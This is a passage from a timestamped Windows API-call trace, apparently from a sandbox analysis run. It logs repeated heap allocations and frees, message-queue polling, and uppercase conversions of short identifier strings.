wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0150.066] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0150.066] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7af) returned 0x2aae878 [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0150.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0150.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0150.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7af) returned 0x2a75110 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0150.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0150.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0150.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.068] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0150.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0150.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0150.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0150.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.071] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0150.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa090 [0150.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0150.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0150.072] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0150.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0150.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0150.072] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0150.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4b0 [0150.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0150.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0150.073] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0150.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0150.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, 